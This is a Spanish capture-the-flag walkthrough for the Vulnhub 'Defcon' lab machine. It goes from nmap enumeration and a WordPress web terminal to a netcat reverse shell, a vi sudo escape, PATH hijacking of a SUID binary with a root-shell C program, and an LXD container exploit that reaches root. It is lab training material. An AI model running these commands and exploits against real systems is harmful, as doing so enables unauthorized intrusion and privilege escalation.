[VLN] Defcon

Hoy vamos a hackear la maquina de Vulnhub llamada Defcon. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/defcon-1,490/
  • Vide0
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@m0nique:~$ nmap -A -p- 192.168.112.136 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-14 21:40 CEST Nmap scan report for 192.168.112.136 Host is up (0.00096s latency). Not shown: 65531 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh? |_ssh-hostkey: ERROR: Script execution failed (use -d to debug) 80/tcp open http Apache httpd 2.4.25 |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Did not follow redirect to https://nsa-server.net 222/tcp closed rsh-spx 443/tcp open ssl/http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Job Search | Intelligence Careers | ssl-cert: Subject: commonName=nsa-server/organizationName=National Security Agency/stateOrProvinceName=New-York/countryName=US | Not valid before: 2019-06-10T14:04:18 |_Not valid after: 2019-07-10T14:04:18 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port22-TCP:V=7.80%I=7%D=6/14%Time=5EE67DC6%P=x86_64-pc-linux-gnu%r(Gene SF:ricLines,5,"!t>\r\n"); Service Info: Host: nsa-server Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 289.46 seconds
    Al entrar a http://192.168.112.141 nos redirige a nsa-server.net, el cual no encuentra... Agregamos nsa-server.net a /etc/hosts. Una vez agregado, entramos en http://nsa-server.net. Si revisamos el certificado, en "Detalles -> Issuers" podemos ver una direccion de mail john@nsa-secretserver.net. Agregamos tambien nsa-secretserver.net a /etc/hosts. Visitamos https://nsa-secretserver.net/ Si vemos la "animacion" de la consola que nos aparece en la pagina principal, justo al final podremos ver:
    DATA EXFILTRATION STARTING…………………….. -/..../.\.--/---/.-./-../.--./.-././…/…\.--./.-/…/…/.--/---/.-./-..\---/ ..-.\.---/---/…./-.\../…\…/-/.----/.-../.-../…--/.-/…/-.--/-.-.--/-.-. --/-.-.-- END OF TRANSMISSION! REBOOTING SYSTEM…………………………
    Parece codigo morse, asi que vamos a tratar de ver que dice. Lo primero es eliminar el caracter "\". El caracter "/" lo podemos mantener, o reemplazarlo por un espacio. Quedaria de la siguiente forma:
    - .... . .-- --- .-. -.. .--. .-. . ... ... .--. .- ... ... .-- --- .-. -.. --- ..-. .--- --- .... -. .. ... ... - .---- .-.. .-.. ...-- .- ... -.-- -.-.-- -.-.-- -.-.--
    Una vez con el codigo morse "limpio" vamos a la siguiente web y hacemos la traduccion. https://morsecode.world/international/translator.html El resultado es:
    THEWORDPRESSPASSWORDOFJOHNISST1LL3ASY!!!
    Si miramos bien, nos indica que los credenciales para acceder al Wordpress son: JOHN/ST1LL3ASY!!! Sabiendo esto vamos a https://nsa-secretserver.net/wp-admin y nos logueamos con los credenciales que hemos conseguido. Vamos a: WORDPRESS -> TOOLS -> WPTERM Tenenemos acceso a una terminal :) Ponemos nc en la escucha en nuestra maquina.
    sml@m0nique:~$ nc -nlvp 5555 listening on [any] 5555 ...
    En la terminal "web" ejecutamos:
    graham:/var/www/wordpress $ nc -e /bin/bash 192.168.112.128 5555
    Y obtenemos la reverse shell.
  • Graham to John
  • sml@m0nique:~$ nc -nlvp 5555 listening on [any] 5555 ... connect to [192.168.112.128] from (UNKNOWN) [192.168.112.136] 49098 python3 -c 'import pty; pty.spawn("/bin/bash");' graham@nsa-server:/home/graham$
    Exploramos un poco el sistema, y en el fichero mbox del directorio de graham podemos ver lo siguiente:
    graham@nsa-server:/home/graham$ cat mbox From john@nsa-server Mon Jun 10 11:35:48 2019 Return-path: Envelope-to: graham@nsa-server Delivery-date: Mon, 10 Jun 2019 11:35:48 +0200 Received: from john by nsa-server with local (Exim 4.89) (envelope-from ) id 1haGiS-0004Sh-6R for graham@nsa-server; Mon, 10 Jun 2019 11:35:48 +0200 To: Subject: password problems X-Mailer: mail (GNU Mailutils 3.1.1) Message-Id: From: john@nsa-server Date: Mon, 10 Jun 2019 11:35:48 +0200 Hi Graham, Sorry man to bother you, but I forgot my password. I don't want to go to Smith because he will rip me a new hole. Can you please help me? Thanks man!!! John
    Parece que "john" ha olvidado la password. Seguimos investigando el sistema y miramos el fichero .viminfo.
    graham:/home/graham $ cat .viminfo ---SNIP--- # This viminfo file was generated by Vim 8.0. # You may edit it if you're careful! # Debug Line History (newest to oldest): # Registers: ""1 LINE 0 export SSLKEYLOGFILE=/home/graham/master.log |3,1,1,1,1,0,1557842873,"export SSLKEYLOGFILE=/home/graham/master.log" # File marks: '0 20 0 ~/.local/share/Trash/files/note.txt |4,48,20,0,1560159846,"~/.local/share/Trash/files/note.txt" ----SNIP----
    Al parecer ha estado editando el fichero note.txt.. Lo revisamos.
    graham@nsa-server:/home/graham$ cat ~/.local/share/Trash/files/note.txt cat ~/.local/share/Trash/files/note.txt Hi John, After your latest password failure I changed it. You know where it is right? Wink Wink! Pretty easy right? Try not to forget this one also. You know how the boss is like! You wanna get fired or something? Also smart idea to sent this message with netcat right? I don't trust our mailsystem. After sending this message, I'll trow it away....no one will know. hahahaha......now who is a cybernoob!!!! Best, Graham P.S. You Do kNow whEre The paSswoRd Is hiDden rigHt?
    Despues de mirar bien el mensaje, vemos que el password de john son las letras "mayusuclas" que aparecen en P.S, asi que el password de john es YDNETSRIDH. Teniendo estos credenciales, nos cambiamos al usuario john.
    graham@nsa-server:/home/graham$ su john
    Miramos si john puede hacer algo con sudo.
    john@nsa-server:~$ sudo -l sudo -l Matching Defaults entries for john on nsa-server: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User john may run the following commands on nsa-server: (ALL) PASSWD: /bin/systemctl start ssh, /bin/systemctl stop ssh, /bin/systemctl status ssh
    Podemos arrancar ssh asi que lo arrancamos :)
    john@nsa-server:~$ sudo /bin/systemctl start ssh
    Miramos en que puerto se ejecuta.
    john@nsa-server:~$ netstat -ntlp netstat -ntlp (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - tcp 0 0 10.14.185.1:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:222 0.0.0.0:* LISTEN -
    Vemos que se ejecuta en el puerto 222, asi que nos logueamos como john usando ssh.
  • John to George
  • sml@m0nique:~$ ssh john@192.168.112.136 -p 222 john@192.168.112.136's password: Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. No mail. Last login: Wed Apr 22 13:16:25 2020 from 192.168.20.131 john@nsa-server:~$
    Tras explorar el sistema como john, vemos un fichero curioso en /home/john/Documents que se llama secret.png. Lo copiamos a nuestra maquina.
    sml@m0nique:~$ scp -P 222 john@192.168.112.136:/home/john/Documents/secret.png .
    Miramos de que tipo de fichero se trata.
    sml@m0nique:~$ file secret.png secret.png: PDF document, version \012.\012
    La extension es .png sin embargo, el comando "file" nos indica que se trata de un documento PDF. Abrimos el fichero con GHEX, modificamos el HEADER por: 89 50 4E 47 0D 0A 1A 0A, es decir el Header de un PNG. Una vez cambiado el Header, guardamos y podemos abrir el fichero como una imagen. Vemos que la password es: 2W3dsF5tGh-Kl#1 Tras probar con los usuarios del sistema, la clave es del usuario george. Nos conectamos como george...
  • George to Samantha
  • sml@m0nique:~$ ssh george@192.168.112.136 -p 222 george@192.168.112.136's password: Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Apr 22 13:56:10 2020 from 192.168.20.131
    Miramos que puede hacer con sudo.
    george@nsa-server:~$ sudo -l [sudo] password for george: Matching Defaults entries for george on nsa-server: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User george may run the following commands on nsa-server: (samantha) /usr/bin/vi
    Vemos que puede ejecutar vi como samantha. Lo hacemos.
    george@nsa-server:~$ sudo -u samantha /usr/bin/vi
    Y para obtener una shell como samantha usando vi:
    :!/bin/bash
  • Samantha to Nicky
  • En la home de samantha podemos ver un fichero interesante, check.
    samantha@nsa-server:~$ cd /home/samantha samantha@nsa-server:~$ ls -l total 60 -rwsr-xr-x 1 root root 8792 Apr 10 16:17 check
    Al ejecutarlo, vemos que es la salida del comando "ss"
    samantha@nsa-server:~$ strings check ---SNIP--- /lib64/ld-linux-x86-64.so.2 libc.so.6 setuid puts system __cxa_finalize setgid __libc_start_main ss -tupan .comment
    Tras mirar con strings, vemos que no usa la ruta completa para ejecutar ss... Sabiendo esto, vamos a usar un "ss" que nos otorgara una shell. Primero, agregamos a la variable PATH que busque nuestro directorio actual para que antes de ejecutar el "ss" autentico, ejecute el falso.
    samantha@nsa-server:~$ export PATH=.:$PATH samantha@nsa-server:~$ echo $PATH .:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    En nuestra maquina preparamos el ss "falso".
    samantha@nsa-server:~$ cat ss.c #include #include #include int main(void) { setuid(0); setgid(0); system("/bin/bash"); } samantha@nsa-server:~$ gcc -o ss ss.c ss.c: In function ‘main’: ss.c:7:1: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration] system("/bin/bash"); ^~~~~~
    Lo compilamos y damos los permisos correspondientes.
    samantha@nsa-server:~$ chmod u+s ss samantha@nsa-server:~$ chmod +x ss
    Por ultimo, ejecutamos!
    samantha@nsa-server:~$ ./check [-] These are all the connections at the moment: bash-4.4$ id uid=1007(nicky) gid=1007(nicky) groups=1007(nicky),1006(samantha)
  • Nicky to Root
  • Bien, ahora que somos "nicky" exploramos el sistema.
    bash-4.4$ cd /home/nicky/Documents bash-4.4$ ls -la total 12 drwxr-xr-x 2 nicky nicky 4096 Apr 22 14:54 . drwxr-x--- 10 nicky nicky 4096 Apr 10 17:01 .. -rw-r--r-- 1 nicky nicky 14 Apr 22 14:54 .passwd bash-4.4$ cat .passwd We_iuh#-qaSW1
    Parece que hemos encontrado su password :) La usamos para conectarnos por ssh como nicky.
    sml@m0nique:~$ ssh nicky@192.168.112.136 -p 222 nicky@192.168.112.136's password: nicky@nsa-server:~$
    Miramos si nicky puede conectarse al mysql.
    nicky@nsa-server:~$ mysql -u nicky -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 45 Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]>
    Estamos dentro de mysql :) Exploramos las BBDD.
    MariaDB [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | wordpress | +--------------------+ 4 rows in set (0.01 sec)
    Elegimos la BBDD mysql.
    MariaDB [(none)]> use mysql; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed
    Miramos que tablas hay.
    MariaDB [mysql]> show tables; +---------------------------+ | Tables_in_mysql | +---------------------------+ | column_stats | | columns_priv | | db | | event | | func | | general_log | | gtid_slave_pos | | help_category | | help_keyword | | help_relation | | help_topic | | host | | index_stats | | innodb_index_stats | | innodb_table_stats | | plugin | | proc | | procs_priv | | proxies_priv | | roles_mapping | | servers | | slow_log | | table_stats | | tables_priv | | time_zone | | time_zone_leap_second | | time_zone_name | | time_zone_transition | | time_zone_transition_type | | user | +---------------------------+ 30 rows in set (0.00 sec)
    Hay una tabla curiosa, llamada user. Le echamos un vistazo.
    MariaDB [mysql]> select * from user; ---SNIP--- +-----------+---------+------ | Host | User | Password +-----------+---------+------------- | localhost | admin | *6B6D111D0EC8D42C2955E082DD087C3E56B17F98 | | % | smith | *BE84A0E22A8E3E1EAA0883956B3F8692DFE4CA13 | | localhost | nicky | *75961C95665DC2BAC3F947AF4C60FD73564BCFE2 | +-----------+---------+-------------------------------------------- ---SNIP--- 5 rows in set (0.00 sec)
    Vemos que aparece el usuario smith... Buscamos el hash/password en google... Nos manda a: https://twitter.com/onlinehashcrack/status/287432972456562689 en el cual se puede ver que la password es: abygurl69 Nos logueamos como el usuario smith. Vemos que smith esta en el grupo lxc. Buscamos el ejecutable "lxc" y agregamos la ruta a nuestra variable $PATH.
    smith@nsa-server:~$ whereis lxc lxc: smith@nsa-server:~$ clear smith@nsa-server:~$ find / -name lxc 2>/dev/null /etc/bash_completion.d/lxc /usr/share/bash-completion/completions/lxc /var/snap/lxd/common/lxc /snap/bin/lxc /snap/lxd/10756/bin/lxc /snap/lxd/10756/commands/lxc /snap/lxd/10756/lxc /home/smith/snap/lxd/10756/.config/lxc smith@nsa-server:~$ export PATH=/snap/bin:$PATH
    En /home/smith vemos un script sh llamado lxd-exploit el cual puede funcionar... Al ejecutarlo sin parametros nos dice que necesita el nombre del container...
    smith@nsa-server:~$ sh lxd-exploit.sh lxd-exploit.sh The exploit currently requires an existing container.
    Miramos el nombre de los containers que hay.
    smith@nsa-server:~$ lxc list +---------+---------+------+------+------------+-----------+ | NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS | +---------+---------+------+------+------------+-----------+ | nsa-lab | STOPPED | | | PERSISTENT | | +---------+---------+------+------+------------+-----------+
    Vemos que hay una maquina llamada nsa-lab. Sabien que el nombre de maquina es nsa-lab, ejecutamos el exploit.
    smith@nsa-server:~$ sh lxd-exploit.sh nsa-lab [+] Stopping container nsa-lab Error: The container is already stopped [+] Setting container security privilege on [+] Starting container nsa-lab [+] Mounting host root filesystem to nsa-lab Device rootdisk added to nsa-lab [+] Using container to add smith to /etc/sudoers [+] Unmounting host root filesystem from nsa-lab Device rootdisk removed from nsa-lab [+] Resetting container security privilege to off [+] Stopping the container [+] Done! Enjoy your sudo superpowers!
    Vamos a disfrutar de nuestros superpoderes sudo!
  • Privilege Escalation
  • smith@nsa-server:~$ sudo su root@nsa-server:/home/smith#
    Y ya con root, terminamos de explorar...
  • root.txt
  • root@nsa-server:~# ls clean.sh Documents endlessh names Public snap thinclient_drives Desktop Downloads Music Pictures root.txt Templates Videos root@nsa-server:~# cat root.txt CONGRATULATIONS!!!! YOU JUST PWND THIS MACHINE
  • End
  • Y con esto ya seriamos root de la maquina :)